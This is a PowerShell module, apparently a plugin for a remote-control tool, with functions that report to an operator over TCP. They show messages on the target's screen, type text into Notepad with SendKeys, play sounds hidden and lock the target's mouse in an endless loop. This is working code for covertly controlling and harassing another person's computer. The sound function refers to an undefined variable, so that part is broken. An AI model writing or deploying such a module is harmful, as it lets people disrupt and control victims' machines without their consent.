#n MiniApps
#v 2.0
#hStart message
#
#	[box] [Message] writes a message with Windows MessageBox
#	[notepad] [Message] writes a message in notepad
#	[notepad] [Message] <slow> writes it slowly
#hEnd
#hStart playsound
#
#	[FileName] plays a .wav hidden
#hEnd
#hStart mouse
#
#	[lock] locks the mouse at 0 0
#	[unlock] unlocks the mouse
#hEnd

function message ($style, $message, [switch]$slow)
{
	$message = $message.Replace("~", " ")
	
	if ($style -eq "box")
	{
		msg $env:USERNAME $message
		WriteTCPMessage "`nMessage Sent!`n"
	}
	if ($style -eq "notepad")
	{
		
		notepad
		Start-Sleep -Seconds 1
		if ($slow)
		{
			foreach ($letter in $message.ToCharArray())
			{
				(New-Object -ComObject WScript.Shell).SendKeys($letter)
				Start-Sleep -Milliseconds 500
			}
		}
		else { (New-Object -ComObject WScript.Shell).SendKeys($message) }
		WriteTCPMessage "`nMessage Sent!`n"
	}
	if ($style -notin @("box", "notepad")) { WriteTCPMessage "`nInvalid Command!`n" }
	
	Remove-Variable style, message, slow -ErrorAction SilentlyContinue
}

function playsound ($file)
{
	try
	{
		$file = $file.Replace("~", " ")
		$file = (Get-Item $file).FullName
		$player = New-Object System.Media.SoundPlayer

		$player.Load($FileName)
		$player.Play()
		WriteTCPMessage "`nPlaying Now!`n"
	}
	catch {WriteTCPMessage "`nUnable to Play file`n"}
	Remove-Variable file, player -ErrorAction SilentlyContinue
}

function mouse ($argument)
{
	Add-Type -AssemblyName System.Windows.Forms
	
	if ($argument -eq "lock")
	{
		$Global:lock = Start-Job -ScriptBlock { Add-Type -AssemblyName System.Windows.Forms; while ($true) { [System.Windows.Forms.Cursor]::Position = @{ x = 0; y = 0 } } } 
		WriteTCPMessage "`nMouse Locked!`n"
	}
	elseif ($argument -eq "unlock")
	{
		$Global:lock.StopJob()
		WriteTCPMessage "`nMouse Unlocked!`n"
	}
	else { WriteTCPMessage "`nInvalid Command!`n" }

	Remove-Variable argument, lock, process -ErrorAction SilentlyContinue
	
}
